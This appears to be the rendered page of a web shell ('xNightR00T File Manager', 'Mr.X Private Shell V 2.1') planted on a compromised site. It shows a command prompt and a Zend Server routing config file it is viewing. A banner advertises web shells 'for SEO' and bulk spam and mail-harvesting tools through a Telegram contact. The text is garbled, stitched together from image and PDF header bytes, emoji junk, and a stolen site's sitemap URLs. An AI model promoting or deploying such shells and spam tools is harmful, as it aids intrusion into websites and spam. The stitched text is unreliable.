xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
use Zend\Router\Http\Segment;
use Zend\Router\Http\Regex;
use Zend\Router\Http\Literal;
use Zend\Session\Storage\SessionArrayStorage;

$dependenciesExtensions = array(
    'PDO' => array(),
    'pdo_sqlite' => array(),
    'pdo_mysql' => array('clusteronly' => true), /// cluster only?
);
if (!isAzureEnv() && !isZrayStandaloneEnv()) {
    $dependenciesExtensions['Zend Utils'] = array();
}

return array(
    'allowedWebAPIActions' => array(
        'EmailWebApi' => array('emailSend'),
        'NotificationsWebApi' => array('sendNotification', 'updateNotification'),
        'LogsWebApi' => array('jsLogs'),
    ),
    'dependencies' => array(
        'directives' => array(
            'session.auto_start' => array('type' => 'boolean', 'required' => false),
            'auto_append_file' => array('type' => 'string', 'required' => ''),
            'auto_prepend_file' => array('type' => 'string', 'required' => ''),
            'variables_order' => array('type' => 'options', 'required' => array('GPCS', 'EGPCS')),
            'arg_separator.output' => array('type' => 'string', 'required' => '&'),
        ),
        'extensions' => $dependenciesExtensions,
    ),
    'session_config' => [],
    'session_storage' => [
        'type' => SessionArrayStorage::class
    ],
    'layout' => 'layouts/layout.phtml',
    'baseUrl' => '/ZendServer',
    'loginUrl' => '/ZendServer/Login',
    'logs' => array(
        'log_files' => array(
            'codetracing',
            'datacache',
            'deployment',
            'jobqueue',
            'jqd',
            'monitor',
            'monitor_node',
            'pagecache',
            'php',
            'sc',
            'scd',
            'zdd',
            'zsd',
            'statsd',
        )
    ),
    'service_manager' => array(
        'factories' => array(
            'translator' => 'Zend\I18n\Translator\TranslatorServiceFactory',
        ),
    ),
    'translator' => array(
        'locale' => 'en_US', // full locale string, can be overridden by configuration in zs_ui.ini
        'event_manager_enabled' => false, /// override in zs_ui.ini
        /*
         * [translator]
         * locale = en_US
         * event_manager_enabled = false
         */
        'translation_file_patterns' => array(
            array(
                'type' => 'phparray', /// phparray or gettext
                'base_dir' => __DIR__.'/../language',
                'pattern' => '%s.php', /// this string goes into sprintf as a pattern and should adhere to its syntax, %s will be replaced by the full locale string
            ),
        ),
    ),
    'router' => array(
        'routes' => array(
            'default' => array(
                'type' => Segment::class,
                'options' => array(
                    'route' => '[/:controller[/:action]][/]',
                    'constraints' => array(
                        'controller' => '[a-zA-Z][a-zA-Z0-9_-]*',
                        'action' => '[a-zA-Z][a-zA-Z0-9_-]*',
                    ),
                    'defaults' => array(
                        'controller' => 'index',
                        'action' => 'index',
                    ),
                ),
            ),
            'extensions' => array(
                'type' => Segment::class,
                'options' => array(
                    'route' => '[/:controller[/:action]][/]',
                    'constraints' => array(
                        'controller' => '[a-zA-Z][a-zA-Z0-9_-]*',
                        'action' => '[a-zA-Z][a-zA-Z0-9_-]*',
                    ),
                    'defaults' => array(
                        'controller' => 'index',
                        'action' => 'index',
                    ),
                ),
            ),
//			'expired' => array(
//				'type' => Segment::class,
//				'options' => array(
//					'route' => '/Expired[/]',
//					'defaults' => array(
//						'controller' => 'Expired',
//						'action' => 'index',
//						'requireIdentity' => false
//					),
//				),
//			),
            'login' => array(
                'type' => Segment::class,
                'options' => array(
                    'route' => '/Login[/]',
                    'defaults' => array(
                        'controller' => 'Login',
                        'action' => 'index',
                        'requireIdentity' => false
                    ),
                ),
            ),
            'logout' => array(
                'type' => Segment::class,
                'options' => array(
                    'route' => '/Login/logout[/]',
                    'defaults' => array(
                        'controller' => 'Login',
                        'action' => 'logout',
                        'licenseexpired' => true
                    ),
                ),
            ),
            'home' => array(
                'type' => 'Application\HomeSwitchRoute',
                'options' => array(
                    'route' => '[/]',
                    'defaults' => array(
                        'action' => 'index',
                    ),
                ),
                'may_terminate' => true,
                'child_routes' => array(
                    'dashboard' => array(
                        'type' => 'Application\HomeSwitchRoute',
                        'options' => array(
                            'route' => 'Dashboard[/]',
                            'defaults' => array(
                                'controller' => 'Dashboard',
                            ),
                        ),
                    ),
                    'Spa' => array(
                        'type' => 'Application\HomeSwitchRoute',
                        'options' => array(
                            'route' => 'Spa/',
                            'defaults' => array(
                                'controller' => 'Spa',
                            ),
                        ),
                    ),
                    'guidepage' => array(
                        'type' => 'Application\HomeSwitchRoute',
                        'options' => array(
                            'route' => 'GuidePage[/]',
                            'defaults' => array(
                                'controller' => 'GuidePage',
                            ),
                        ),
                    ),
                    'homeindex' => array(
                        'type' => Literal::class,
                        'options' => array(
                            'route' => 'index.php',
                            'defaults' => array(
                                'controller' => 'Login',
                                'action' => 'redirect',
                            ),
                        ),
                    ),
                )
            ),
            'index' => array(
                'type' => Segment::class,
                'options' => array(
                    'route' => '/Index/Index',
                    'defaults' => array(
                        'controller' => 'Dashboard',
                        'action' => 'index',
                    ),
                ),
            ),
            // static resources from modules
            'module_resource' => array(
                'type' => Regex::class,
                'options' => array(
                    'regex' => '/ModuleResource[/]?(?<moduleName>[^/]*)[/]?(?<resourceName>.*)',
                    'spec' => '/ModuleResource/%moduleName%/%resourceName%',
                    'defaults' => array(
                        'controller' => 'ModuleResource',
                        'action' => 'index',
                    ),
                ),
            ),
        ),
    ),
    'controllers' => array(
        'invokables' => array(
            'Dashboard' => 'Application\Controller\IndexController',
            'Settings' => 'Application\Controller\SettingsController',
            'ImportExport' => 'Application\Controller\ImportExportController',
            'ModuleResource' => 'Application\Controller\ModuleResourceController',
            'Expired' => 'Expired\Controller\IndexController',
            'Login' => 'Application\Controller\LoginController',
            'Bootstrap' => 'Bootstrap\Controller\BootstrapController',
            'ServersWebAPI-1_3' => 'Servers\Controller\WebAPIController',
            'ServersWebAPI-1_2' => 'Servers\Controller\WebAPI12Controller',
            'UsersWebAPI-1_3' => 'Users\Controller\WebAPIController',
            'UsersWebAPI-1_12' => 'Users\Controller\WebAPIController',
            'Servers' => 'Servers\Controller\IndexController',
            'Spa' => 'Spa\Controller\IndexController',
            'Logs' => 'Logs\Controller\IndexController',
            'LogsWebApi' => 'Logs\Controller\WebAPIController',
            'LogsWebApi-1_3' => 'Logs\Controller\WebAPIController',
            'LogsWebApi-1_12' => 'Logs\Controller\WebAPIController',
            'Underconstruction' => 'Application\Controller\UnderconstructionController',
            'Users' => 'Users\Controller\IndexController',
            'EmailWebApi-1_3' => 'Email\Controller\WebAPIController',
            'NotificationsWebApi-1_3' => 'Notifications\Controller\WebApiController',
            'NotificationsWebApi-1_6' => 'Notifications\Controller\WebApiController',
            'NotificationsWebApi-1_13' => 'Notifications\Controller\WebApiController',
            'NotificationsWebApi-1_15' => 'Notifications\Controller\WebApiController',
            'AclWebApi-1_3' => 'Acl\Controller\WebAPIController',
            'ApplicationWebApi-1_3' => 'Application\Controller\WebApiController',
            'BootstrapWebAPI-1_3' => 'Bootstrap\Controller\WebAPIController',
            'BootstrapWebAPI-1_10' => 'Bootstrap\Controller\WebAPIController',
            'ZsdWebAPI-1_5' => 'Zsd\Controller\WebAPIController',
        ),
    ),
    'view_helpers' => array(
        'invokables' => array(
            'zGridEventDetails' => 'Application\View\Helper\ZGridEventDetails',
            'zGridLibraryDetails' => 'Application\View\Helper\ZGridLibraryDetails',
            'zGridJobDetails' => 'Application\View\Helper\ZGridJobDetails',
            'zGridQueueDetails' => 'Application\View\Helper\ZGridQueueDetails',
            'zPager' => 'Application\View\Helper\ZPager',
            'uiDate' => 'Application\View\Helper\UiDate',
            'contactZend' => 'Application\View\Helper\ContactZend',
            'dateFormat' => 'Application\View\Helper\DateFormat',
            'zGrid' => 'Application\View\Helper\ZGrid',
            'zGrid2' => 'Application\View\Helper\ZGrid2',
            'filter' => 'Application\View\Helper\Filter',
            'onOffButton' => 'Application\View\Helper\OnOffButton',
            'searchField' => 'Application\View\Helper\SearchField',
            'zGridPolling' => 'Application\View\Helper\ZGridPolling',
            'acl' => 'Application\View\Helper\Acl',
            'datePicker' => 'Application\View\Helper\DatePicker',
            'highlighter' => 'Application\View\Helper\Highlighter',
            'serverErrorMessageXml' => 'Messages\View\Helper\ServerErrorMessageXml',
            'serverErrorMessageJson' => 'Messages\View\Helper\ServerErrorMessageJson',
            'serverStatus' => 'Servers\View\Helper\ServerStatus',
            'zGridServerDetails' => 'Servers\View\Helper\ZGridServerDetails',
            'serverInfoXml' => 'Servers\View\Helper\serverInfoXml',
            'serverInfoJson' => 'Servers\View\Helper\serverInfoJson',
            'logFileLines' => 'Logs\View\Helper\LogFileLines',
            'emailSubject' => 'Email\View\Helper\EmailSubject',
            'capabilitiesLabels' => 'Application\View\Helper\CapabilitiesLabels',
            'freeEditionString' => 'Application\View\Helper\FreeEditionString',
            'editionString' => 'Application\View\Helper\EditionString',
            'messageLabels' => 'Zsd\View\Helper\MessageLabels',
            'daemonMessageJson' => 'Zsd\View\Helper\DaemonMessageJson',
            'daemonMessageXml' => 'Zsd\View\Helper\DaemonMessageXml',
            'getResourceUrl' => 'Application\View\Helper\GetResourceUrl',
            'usersListXml' => 'Users\View\Helper\usersListXml',
            'arrayToXml' => 'Application\View\Helper\ArrayToXml',
        )
    ),
    'view_manager' => array(
        'doctype' => 'HTML5',
        'not_found_template' => 'error/404',
        'exception_template' => 'error/index',
        'permissions_template' => 'error/permissions',
        'template_map' => array(
            'index/index' => __DIR__.'/../views/index/index.phtml',
        ),
        'template_path_stack' => array(
            __DIR__.'/../views',
        ),
    ),
    'allowedWebAPIActions' => array(
        'DeploymentWebAPI' => array('applicationSynchronize'),
        'NotificationsWebApi' => array('sendNotification'),
        'LogsWebApi' => array('jsLogs'),
    ),
    'webapi_routes_bootstrap' => array(
        'serverAddToCluster' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/serverAddToCluster',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'serverAddToCluster',
                    'versions' => array('1.3'),
                    'bootstrap' => true
                ),
            ),
        ),
        'clusterIsInitialized' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterIsInitialized',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'clusterIsInitialized',
                    'versions' => array('1.3'),
                    'bootstrap' => true
                ),
            ),
        ),
    ),
    'expired_routes' => array(
        'default' => array(
            'type' => Segment::class,
            'options' => array(
                'route' => '/[:controller[/:action]][/]',
                'constraints' => array(
                    'controller' => '[a-zA-Z][a-zA-Z0-9_-]*',
                    'action' => '[a-zA-Z][a-zA-Z0-9_-]*',
                ),
                'defaults' => array(
                    'controller' => 'index',
                    'action' => 'index',
                ),
            ),
        ),
    ),
    'webapi_routes' => array(
        'bootstrapSingleServer' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/bootstrapSingleServer',
                'defaults' => array(
                    'controller' => 'BootstrapWebAPI',
                    'action' => 'bootstrapSingleServer',
                    'versions' => array('1.3'),
                    'bootstrap' => true,
                    'bootstraponly' => true
                ),
            ),
        ),
        'setServerProfile' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/setServerProfile',
                'defaults' => array(
                    'controller' => 'BootstrapWebAPI',
                    'action' => 'setServerProfile',
                    'versions' => array('1.10')
                ),
            ),
        ),
        'getServerProfile' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/getServerProfile',
                'defaults' => array(
                    'controller' => 'BootstrapWebAPI',
                    'action' => 'getServerProfile',
                    'versions' => array('1.10')
                ),
            ),
        ),
        'usersGetList' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/usersGetList',
                'defaults' => array(
                    'controller' => 'UsersWebAPI',
                    'action' => 'usersGetList',
                    'versions' => array('1.12')
                ),
            ),
        ),
        'usersGetMappedGroups' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/usersGetMappedGroups',
                'defaults' => array(
                    'controller' => 'UsersWebAPI',
                    'action' => 'usersGetMappedGroups',
                    'versions' => array('1.12')
                ),
            ),
        ),
        'userAuthenticationSettings' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/userAuthenticationSettings',
                'defaults' => array(
                    'controller' => 'UsersWebAPI',
                    'action' => 'userAuthenticationSettings',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'userGetAuthenticationSettings' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/userGetAuthenticationSettings',
                'defaults' => array(
                    'controller' => 'UsersWebAPI',
                    'action' => 'userGetAuthenticationSettings',
                    'versions' => array('1.12')
                ),
            ),
        ),
        'clusterAddServer' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterAddServer',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'clusterAddServer',
                    'versions' => array('1.2', '1.3')
                ),
            ),
        ),
        'clusterGetServerStatus' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterGetServerStatus',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'clusterGetServerStatus',
                    'versions' => array('1.2'),
                    'viewsmap' => array('1.2' => '1.3')
                ),
            ),
        ),
        'clusterGetServersCount' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterGetServersCount',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'clusterGetServersCount',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'restartPhp' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/restartPhp',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'restartPhp',
                    'versions' => array('1.2', '1.3'),
                    'viewsmap' => array('1.2' => '1.3')
                ),
            ),
        ),
        'daemonsProbe' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/daemonsProbe',
                'defaults' => array(
                    'controller' => 'ZsdWebAPI',
                    'action' => 'daemonsProbe',
                    'versions' => array('1.5'),
                ),
            ),
        ),
        'restartDaemon' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/restartDaemon',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'restartDaemon',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'clusterEnableServer' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterEnableServer',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'clusterEnableServer',
                    'versions' => array('1.2', '1.3')
                ),
            ),
        ),
        'clusterDisableServer' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterDisableServer',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'clusterDisableServer',
                    'versions' => array('1.2', '1.3')
                ),
            ),
        ),
        'clusterRemoveServer' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterRemoveServer',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'clusterRemoveServer',
                    'versions' => array('1.2', '1.3')
                ),
            ),
        ),
        'clusterForceRemoveServer' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterForceRemoveServer',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'clusterForceRemoveServer',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'changeServerNameById' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/changeServerNameById',
                'defaults' => array(
                    'controller' => 'ServersWebAPI',
                    'action' => 'changeServerNameById',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'userSetPassword' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/userSetPassword',
                'defaults' => array(
                    'controller' => 'UsersWebAPI',
                    'action' => 'userSetPassword',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'setPassword' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/setPassword',
                'defaults' => array(
                    'controller' => 'UsersWebAPI',
                    'action' => 'setPassword',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'emailSend' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/emailSend',
                'defaults' => array(
                    'controller' => 'EmailWebApi',
                    'action' => 'emailSend',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'getNotifications' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/getNotifications',
                'defaults' => array(
                    'controller' => 'NotificationsWebApi',
                    'action' => 'getNotifications',
                    'versions' => array('1.3', '1.6', '1.13', '1.15'),
                ),
            ),
        ),
        'aclSetGroups' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/aclSetGroups',
                'defaults' => array(
                    'controller' => 'AclWebApi',
                    'action' => 'aclSetGroups',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'deleteNotification' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/deleteNotification',
                'defaults' => array(
                    'controller' => 'NotificationsWebApi',
                    'action' => 'deleteNotification',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'updateNotification' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/updateNotification',
                'defaults' => array(
                    'controller' => 'NotificationsWebApi',
                    'action' => 'updateNotification',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'sendNotification' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/sendNotification',
                'defaults' => array(
                    'controller' => 'NotificationsWebApi',
                    'action' => 'sendNotification',
                    'versions' => array('1.3'),
                    'bootstrap' => true
                ),
            ),
        ),
        'getLogFiles' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/getLogFiles',
                'defaults' => array(
                    'controller' => 'LogsWebApi',
                    'action' => 'getLogFiles',
                    'versions' => array('1.12')
                ),
            ),
        ),
        'logsReadLines' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/logsReadLines',
                'defaults' => array(
                    'controller' => 'LogsWebApi',
                    'action' => 'logsReadLines',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'jsLogs' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/jsLogs',
                'defaults' => array(
                    'controller' => 'LogsWebApi',
                    'action' => 'jsLogs',
                    'versions' => array('1.3', '1.6', '1.13'),
                ),
            ),
        ),
        'logsGetLogfile' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/logsGetLogfile',
                'defaults' => array(
                    'controller' => 'LogsWebApi',
                    'action' => 'logsGetLogfile',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'clusterReconfigureServer' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/clusterReconfigureServer',
                'defaults' => array(
                    'controller' => 'ConfigurationWebApi',
                    'action' => 'configurationRevertChanges',
                    'versions' => array('1.3')
                ),
            ),
        ),
    ),
);

Filemanager

Name Type Size Permission Actions
known-mime-types.php File 26.82 KB 0644
module.config.php File 26.46 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml